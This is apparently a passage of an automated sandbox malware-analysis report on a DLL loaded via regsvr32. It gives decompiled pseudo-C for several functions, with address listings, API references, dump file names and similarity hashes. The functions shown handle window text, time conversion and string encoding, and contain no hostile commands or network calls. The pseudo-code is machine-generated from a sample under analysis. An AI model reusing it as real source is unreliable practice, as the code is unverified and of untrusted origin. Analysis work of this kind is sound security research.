                                                                                                                0x1000aaca
                                                                                                                0x1000aab2
                                                                                                                0x1000aab5
                                                                                                                0x1000aab9
                                                                                                                0x1000aac0
                                                                                                                0x1000aac5
                                                                                                                0x1000aad4
                                                                                                                0x1000aad9
                                                                                                                0x1000aadf
                                                                                                                0x1000aadf
                                                                                                                0x1000aae2
                                                                                                                0x1000aae5
                                                                                                                0x1000aae6
                                                                                                                0x1000aaec
                                                                                                                0x1000aaed
                                                                                                                0x1000aaf3
                                                                                                                0x1000aaf9
                                                                                                                0x1000aafa
                                                                                                                0x1000ab00
                                                                                                                0x1000ab01
                                                                                                                0x1000ab04
                                                                                                                0x1000ab0a
                                                                                                                0x1000ab0a
                                                                                                                0x1000ab1b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$lstrlen$AllocLockUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3485620298-0
                                                                                                                • Opcode ID: a80b5a4aaa3506d32d484be4876513a8ea2ef846ceb0bf23f531e99caf48785a
                                                                                                                • Instruction ID: e29acd5971e8066f24837a147dbfdc0d19c6ad84f3fd3389191f34aaa7994333
                                                                                                                • Opcode Fuzzy Hash: a80b5a4aaa3506d32d484be4876513a8ea2ef846ceb0bf23f531e99caf48785a
                                                                                                                • Instruction Fuzzy Hash: 27414AB1A00209DFDF40CF64C984AEABBF9FF4A385F11016AED05A7245D375E945CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025B8D Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10025B8D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
				void* _t67;
				void* _t90;
				intOrPtr _t93;
				struct HWND__* _t95;
				void* _t96;
				struct HWND__* _t98;
				long long _t102;

				_t102 = __fp0;
				_t91 = __edi;
				_t90 = __edx;
				_push(0x1c);
				E1004764D(0x1008fa4a, __ebx, __edi, __esi);
				_t95 =  *(_t96 + 8);
				_t98 = _t95;
				_t99 = _t98 == 0;
				if(_t98 == 0) {
					E1000A069(0, __ecx, __edi, _t95, _t99);
				}
				asm("fldz");
				 *((long long*)(_t96 - 0x18)) = _t102;
				 *((intOrPtr*)(_t96 - 0x10)) = 0;
				E1001F0AF(_t95,  *((intOrPtr*)(_t96 + 0xc)));
				E100176B3( *((intOrPtr*)(_t95 + 4)),  *((intOrPtr*)(_t96 + 0xc)), _t96 + 8);
				if(_t95->i == 0) {
					FileTimeToSystemTime( *(_t96 + 0x10), _t96 - 0x28);
					E10023C56(_t96 - 0x18, _t91, __eflags,  *(_t96 - 0x28) & 0x0000ffff,  *(_t96 - 0x26) & 0x0000ffff,  *(_t96 - 0x22) & 0x0000ffff,  *(_t96 - 0x20) & 0x0000ffff,  *(_t96 - 0x1e) & 0x0000ffff,  *(_t96 - 0x1c) & 0x0000ffff);
					_push(0x400);
					_push(0);
					_push(_t96 + 0x10);
					E10025850(0, _t96 - 0x18, _t91, _t95, __eflags);
					 *((intOrPtr*)(_t96 - 4)) = 1;
					E100219F5(_t96 - 0x18, _t90,  *(_t96 + 8),  *(_t96 + 0x10));
					_t83 =  *(_t96 + 0x10) + 0xfffffff0;
					__eflags =  *(_t96 + 0x10) + 0xfffffff0;
				} else {
					_t92 = GetWindowTextLengthA( *(_t96 + 8));
					L1000140B(_t96 + 0xc, E100184C0());
					_t12 = _t92 + 1; // 0x1
					 *((intOrPtr*)(_t96 - 4)) = 0;
					GetWindowTextA( *(_t96 + 8), E100103E6(_t96 + 0xc, _t60), _t12);
					E1000FED3(_t96 + 0xc, 0xffffffff);
					_t93 =  *((intOrPtr*)(_t96 + 0xc));
					_t67 = E10024CA8(_t96 - 0x18, _t90, _t102, _t93, 0, 0x400);
					_t101 = _t67;
					if(_t67 == 0) {
						_push(0xffffffff);
						_push(0);
						_push(0xf118);
						E1001B561(0, _t90, _t93, _t95, _t101);
						E1001ECE0(_t95);
					}
					_push(_t96 - 0x28);
					E10023C1F(_t96 - 0x28, _t96 - 0x18, _t90);
					SystemTimeToFileTime(_t96 - 0x28,  *(_t96 + 0x10));
					_t83 = _t93 - 0x10;
				}
				return E10047725(L100013E3(_t83, _t90));
			}










                                                                                                                0x10025b8d
                                                                                                                0x10025b8d
                                                                                                                0x10025b8d
                                                                                                                0x10025b8d
                                                                                                                0x10025b94
                                                                                                                0x10025b99
                                                                                                                0x10025ba0
                                                                                                                0x10025ba5
                                                                                                                0x10025ba7
                                                                                                                0x10025ba9
                                                                                                                0x10025ba9
                                                                                                                0x10025bae
                                                                                                                0x10025bb5
                                                                                                                0x10025bb8
                                                                                                                0x10025bbb
                                                                                                                0x10025bca
                                                                                                                0x10025bd1
                                                                                                                0x10025c63
                                                                                                                0x10025c8a
                                                                                                                0x10025c8f
                                                                                                                0x10025c94
                                                                                                                0x10025c98
                                                                                                                0x10025c9c
                                                                                                                0x10025ca4
                                                                                                                0x10025cae
                                                                                                                0x10025cb6
                                                                                                                0x10025cb6
                                                                                                                0x10025bd7
                                                                                                                0x10025be0
                                                                                                                0x10025beb
                                                                                                                0x10025bf0
                                                                                                                0x10025bf8
                                                                                                                0x10025c04
                                                                                                                0x10025c0f
                                                                                                                0x10025c14
                                                                                                                0x10025c21
                                                                                                                0x10025c26
                                                                                                                0x10025c28
                                                                                                                0x10025c2a
                                                                                                                0x10025c2c
                                                                                                                0x10025c2d
                                                                                                                0x10025c32
                                                                                                                0x10025c39
                                                                                                                0x10025c39
                                                                                                                0x10025c41
                                                                                                                0x10025c45
                                                                                                                0x10025c51
                                                                                                                0x10025c57
                                                                                                                0x10025c57
                                                                                                                0x10025cc3

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025B94
                                                                                                                • GetWindowTextLengthA.USER32 ref: 10025BDA
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000000), ref: 10025C04
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,000000FF), ref: 10025C51
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,0000001C), ref: 10025C63
                                                                                                                  • Part of subcall function 10023C56: _memset.LIBCMT ref: 10023C67
                                                                                                                  • Part of subcall function 10025850: __EH_prolog3.LIBCMT ref: 10025857
                                                                                                                  • Part of subcall function 100219F5: lstrlenA.KERNEL32(1001F17A,?,?,00000000), ref: 10021A1F
                                                                                                                  • Part of subcall function 100219F5: _memset.LIBCMT ref: 10021A3C
                                                                                                                  • Part of subcall function 100219F5: GetWindowTextA.USER32(?,00000000,00000100), ref: 10021A56
                                                                                                                  • Part of subcall function 100219F5: lstrcmpA.KERNEL32(00000000,1001F17A), ref: 10021A68
                                                                                                                  • Part of subcall function 100219F5: SetWindowTextA.USER32(?,1001F17A), ref: 10021A74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextTimeWindow$H_prolog3$FileSystem_memset$Exception@8LengthThrowlstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3605897416-0
                                                                                                                • Opcode ID: 64716d980226eaca9e1eba3191ba87992bc159ea454a4b02de3db081957958aa
                                                                                                                • Instruction ID: a792ff8d2599d987b958d73a8b16588534a4e79e0e99e15e5fa06729617e6af3
                                                                                                                • Opcode Fuzzy Hash: 64716d980226eaca9e1eba3191ba87992bc159ea454a4b02de3db081957958aa
                                                                                                                • Instruction Fuzzy Hash: 56316C7940010AAFDF00DFA0DC819FE7779FF08351F508129FA11A6091EB35EA91DB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004249E Relevance: 7.6, APIs: 5, Instructions: 99keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004249E(void* __ecx, void* __eflags, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t44;
				signed int _t48;
				signed int _t52;
				signed int _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t80;

				_t80 = __eflags;
				_t75 = __ecx;
				_v8 = E100177F8(__ecx);
				GetWindowRect( *(__ecx + 0x20),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E10013F46(_t67, _t75, _t75, _t80);
				if((_v8 & 0x00001000) == 0) {
					L5:
					__eflags = _t76 - 0xa;
					if(_t76 < 0xa) {
						L7:
						__eflags = _t76 - 4;
						if(_t76 != 4) {
							L16:
							return _t76;
						}
						L8:
						__eflags = _v8 & 0x00000800;
						if((_v8 & 0x00000800) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							__eflags = _v8 & 0x00000200;
							if((_v8 & 0x00000200) == 0) {
								goto L16;
							}
							_t44 = _t76 - 4;
							__eflags = _t44;
							if(_t44 == 0) {
								L21:
								__eflags = _a8 - _v24.bottom;
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							__eflags = _t48;
							if(_t48 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							__eflags = _t52;
							if(_t52 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							__eflags = _t57;
							if(_t57 == 0) {
								__eflags = _a8 - _v24.bottom;
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							__eflags = _t57 == 1;
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
					__eflags = _t76 - 0x11;
					if(_t76 <= 0x11) {
						goto L8;
					}
					goto L7;
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}


















                                                                                                                0x1004249e
                                                                                                                0x100424a7
                                                                                                                0x100424ae
                                                                                                                0x100424b8
                                                                                                                0x100424ca
                                                                                                                0x100424d0
                                                                                                                0x100424dd
                                                                                                                0x100424df
                                                                                                                0x100424fa
                                                                                                                0x100424fa
                                                                                                                0x100424fd
                                                                                                                0x10042504
                                                                                                                0x10042504
                                                                                                                0x10042507
                                                                                                                0x10042544
                                                                                                                0x00000000
                                                                                                                0x10042544
                                                                                                                0x10042509
                                                                                                                0x10042509
                                                                                                                0x1004250f
                                                                                                                0x10042520
                                                                                                                0x10042526
                                                                                                                0x1004252c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042530
                                                                                                                0x10042530
                                                                                                                0x10042533
                                                                                                                0x10042582
                                                                                                                0x10042587
                                                                                                                0x00000000
                                                                                                                0x1004258d
                                                                                                                0x10042535
                                                                                                                0x10042535
                                                                                                                0x10042538
                                                                                                                0x10042576
                                                                                                                0x00000000
                                                                                                                0x1004257c
                                                                                                                0x1004253a
                                                                                                                0x1004253a
                                                                                                                0x1004253b
                                                                                                                0x10042566
                                                                                                                0x00000000
                                                                                                                0x1004256c
                                                                                                                0x1004253e
                                                                                                                0x1004253e
                                                                                                                0x1004253f
                                                                                                                0x10042552
                                                                                                                0x00000000
                                                                                                                0x1004255c
                                                                                                                0x10042541
                                                                                                                0x10042542
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042542
                                                                                                                0x10042513
                                                                                                                0x00000000
                                                                                                                0x10042513
                                                                                                                0x100424ff
                                                                                                                0x10042502
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042502
                                                                                                                0x100424e4
                                                                                                                0x100424e8
                                                                                                                0x100424e8
                                                                                                                0x100424f4
                                                                                                                0x00000000
                                                                                                                0x100424f6
                                                                                                                0x00000000
                                                                                                                0x100424f6

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetWindowRect.USER32 ref: 100424B8
                                                                                                                • GetSystemMetrics.USER32 ref: 100424C6
                                                                                                                • GetSystemMetrics.USER32 ref: 100424CC
                                                                                                                • GetKeyState.USER32(00000002), ref: 100424EB
                                                                                                                • InflateRect.USER32 ref: 10042520
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsRectSystemWindow$InflateLongState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2406722796-0
                                                                                                                • Opcode ID: 2cd11d2c867d08c569cfb2d789efff36ef806e87dbca50b23167bba580d94d7d
                                                                                                                • Instruction ID: 95ef0437d9f863ab6c7eb43219b417ffc42352a2425f8ef67baea1a2dc3f029b
                                                                                                                • Opcode Fuzzy Hash: 2cd11d2c867d08c569cfb2d789efff36ef806e87dbca50b23167bba580d94d7d
                                                                                                                • Instruction Fuzzy Hash: 8921FB31B00919ABDB10EBB8CDA9BAEB7B9FF852D0FA14435D407DB091D570DD40C654
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100256D5 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E100256D5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t28;
				void* _t37;
				void* _t39;
				intOrPtr _t49;
				intOrPtr _t54;
				void* _t55;
				intOrPtr* _t75;
				void* _t76;
				void* _t78;
				signed int _t81;
				void* _t83;

				_t73 = __edx;
				_t81 = _t83 - 0x7c;
				_t28 =  *0x100b9e70; // 0xbb35530
				 *(_t81 + 0x80) = _t28 ^ _t81;
				_push(0x70);
				E1004764D(0x1008f90e, __ebx, __edi, __esi);
				_t75 =  *((intOrPtr*)(_t81 + 0x8c));
				_t54 =  *((intOrPtr*)(_t81 + 0x94));
				E1001F0AF(_t75,  *((intOrPtr*)(_t81 + 0x90)));
				E100176B3( *((intOrPtr*)(_t75 + 4)),  *((intOrPtr*)(_t81 + 0x90)), _t81 - 0x10);
				_t87 =  *_t75;
				if( *_t75 == 0) {
					__imp__StringFromGUID2(_t54, _t81, 0x40);
					_push(_t81);
					_t37 = E10025504(_t54, _t81 - 0x7c, _t75, __esi, __eflags);
					 *(_t81 - 4) = 1;
					E100219F5(_t81 - 0x7c, __edx,  *(_t81 - 0x10),  *((intOrPtr*)(_t37 + 0xc)));
					_t39 = E100252BD(_t81 - 0x7c, __eflags);
				} else {
					_t79 = GetWindowTextLengthA( *(_t81 - 0x10));
					L1000140B(_t81 - 0x14, E100184C0());
					 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
					_t13 = _t79 + 1; // 0x1
					GetWindowTextA( *(_t81 - 0x10), E100103E6(_t81 - 0x14, _t41), _t13);
					E1000FED3(_t81 - 0x14, 0xffffffff);
					_t80 =  *((intOrPtr*)(_t81 - 0x14));
					_t49 =  *((intOrPtr*)(E1000B9D2(_t54, _t81 - 0x18, _t75,  *((intOrPtr*)(_t81 - 0x14)), _t87)));
					__imp__CLSIDFromString(_t49, _t54,  *((intOrPtr*)(_t81 - 0x14)));
					_t56 = _t49;
					L100013E3( *((intOrPtr*)(_t81 - 0x18)) + 0xfffffff0, _t73);
					_t88 = _t49;
					if(_t49 < 0) {
						_push(0xffffffff);
						_push(0);
						_push(0xf11a);
						E1001B561(_t56, _t73, _t75, _t80, _t88);
						E1001ECE0(_t75);
					}
					_t39 = L100013E3(_t80 - 0x10, _t73);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				_pop(_t76);
				_pop(_t78);
				_pop(_t55);
				return E1004763E(_t39, _t55,  *(_t81 + 0x80) ^ _t81, _t73, _t76, _t78);
			}















                                                                                                                0x100256d5
                                                                                                                0x100256dc
                                                                                                                0x100256e0
                                                                                                                0x100256e7
                                                                                                                0x100256ed
                                                                                                                0x100256f4
                                                                                                                0x100256f9
                                                                                                                0x10025705
                                                                                                                0x1002570d
                                                                                                                0x1002571f
                                                                                                                0x10025724
                                                                                                                0x10025727
                                                                                                                0x100257b8
                                                                                                                0x100257c1
                                                                                                                0x100257c5
                                                                                                                0x100257cd
                                                                                                                0x100257d7
                                                                                                                0x100257df
                                                                                                                0x1002572d
                                                                                                                0x10025736
                                                                                                                0x10025741
                                                                                                                0x10025746
                                                                                                                0x1002574a
                                                                                                                0x1002575b
                                                                                                                0x10025766
                                                                                                                0x1002576b
                                                                                                                0x10025777
                                                                                                                0x1002577b
                                                                                                                0x10025787
                                                                                                                0x10025789
                                                                                                                0x1002578e
                                                                                                                0x10025790
                                                                                                                0x10025792
                                                                                                                0x10025794
                                                                                                                0x10025796
                                                                                                                0x1002579b
                                                                                                                0x100257a2
                                                                                                                0x100257a2
                                                                                                                0x100257aa
                                                                                                                0x100257aa
                                                                                                                0x100257e7
                                                                                                                0x100257ef
                                                                                                                0x100257f0
                                                                                                                0x100257f1
                                                                                                                0x10025806

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100256F4
                                                                                                                  • Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0
                                                                                                                • GetWindowTextLengthA.USER32 ref: 10025730
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000000), ref: 1002575B
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                  • Part of subcall function 1000B9D2: __EH_prolog3.LIBCMT ref: 1000B9D9
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 1002577B
                                                                                                                  • Part of subcall function 1001B561: __EH_prolog3.LIBCMT ref: 1001B568
                                                                                                                  • Part of subcall function 1001ECE0: SetFocus.USER32 ref: 1001ED09
                                                                                                                  • Part of subcall function 1001ECE0: SendMessageA.USER32 ref: 1001ED21
                                                                                                                • StringFromGUID2.OLE32(?,00000000,00000040), ref: 100257B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$FromStringTextWindow$FocusItemLengthMessageSend_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 131936272-0
                                                                                                                • Opcode ID: 542c5cde77eb5880299717873fbc9372932c1b254756384ade0b2ccb2610273e
                                                                                                                • Instruction ID: 094891cc8803010f02c60fe69b3d3b19e6c2dcd2f8403b547d8a15b464370062
                                                                                                                • Opcode Fuzzy Hash: 542c5cde77eb5880299717873fbc9372932c1b254756384ade0b2ccb2610273e
                                                                                                                • Instruction Fuzzy Hash: 5D313B79900109ABEB24DFA0DC82BFE7379FF04355F504129F926AB1D2DB34AA05CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100010CD Relevance: 7.6, APIs: 5, Instructions: 84stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E100010CD(void* __eax, void* __edx, short* _a4, int _a8) {
				int _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				signed int _t17;
				char** _t21;
				char** _t22;
				void* _t23;
				int _t26;
				int _t30;
				void* _t33;
				short* _t38;
				void* _t39;

				_t23 = __edx;
				_t38 = _a4;
				_t21 = _t22;
				if(_t38 != 0) {
					_t26 = lstrlenW(_t38) + 1;
					_t30 = _t26 << 2;
					L100011CC(_t21, _t21, _t30,  &(_t21[1]), 0x80);
					_t39 = WideCharToMultiByte;
					_t17 = WideCharToMultiByte(_a8, 0, _t38, _t26,  *_t21, _t30, 0, 0);
					asm("sbb esi, esi");
					_t33 =  ~_t17 + 1;
					if(_t33 != 0) {
						_t17 = GetLastError();
						if(_t17 == 0x7a) {
							_v4 = WideCharToMultiByte(_a8, 0, _a4, _t26, 0, 0, 0, 0);
							L100011CC(_t21, _t21, _v4,  &(_t21[1]), 0x80);
							_t17 = WideCharToMultiByte(_a8, 0, _a4, _t26,  *_t21, _v4, 0, 0);
							asm("sbb esi, esi");
							_t33 =  ~_t17 + 1;
						}
						if(_t33 != 0) {
							_t17 = E10001005(_t22, _t23, _t39);
						}
					}
					return _t17;
				} else {
					 *_t21 =  *_t21 & _t38;
					return __eax;
				}
			}
















                                                                                                                0x100010cd
                                                                                                                0x10002212
                                                                                                                0x10002218
                                                                                                                0x1000221a
                                                                                                                0x1000222e
                                                                                                                0x1000223a
                                                                                                                0x1000223f
                                                                                                                0x10002250
                                                                                                                0x1000225b
                                                                                                                0x10002261
                                                                                                                0x10002263
                                                                                                                0x10002264
                                                                                                                0x10002266
                                                                                                                0x1000226f
                                                                                                                0x10002283
                                                                                                                0x10002295
                                                                                                                0x100022af
                                                                                                                0x100022b5
                                                                                                                0x100022b7
                                                                                                                0x100022b7
                                                                                                                0x100022ba
                                                                                                                0x100022bc
                                                                                                                0x100022bc
                                                                                                                0x100022ba
                                                                                                                0x00000000
                                                                                                                0x1000221c
                                                                                                                0x1000221c
                                                                                                                0x00000000
                                                                                                                0x1000221c

                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?), ref: 10002226
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,00000000), ref: 1000225B
                                                                                                                • GetLastError.KERNEL32(?,00000001,00000000,00000000), ref: 10002266
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 10002281
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000000,?,00000001,00000000,00000000), ref: 100022AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3322701435-0
                                                                                                                • Opcode ID: 2a3b8cb836da67e0ccb9ddea8f742ad8d8c87a6c19cb1d6ea04747123ffd58e7
                                                                                                                • Instruction ID: a391f8928b0f2ae8cbbebc98cfc85c77aed691913884041a6c09ebdd08697e0b
                                                                                                                • Opcode Fuzzy Hash: 2a3b8cb836da67e0ccb9ddea8f742ad8d8c87a6c19cb1d6ea04747123ffd58e7
                                                                                                                • Instruction Fuzzy Hash: AC11E932401274BFE7319A628C49EABBFECEF83BE0F404554FD8996015DA219C25C6F1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

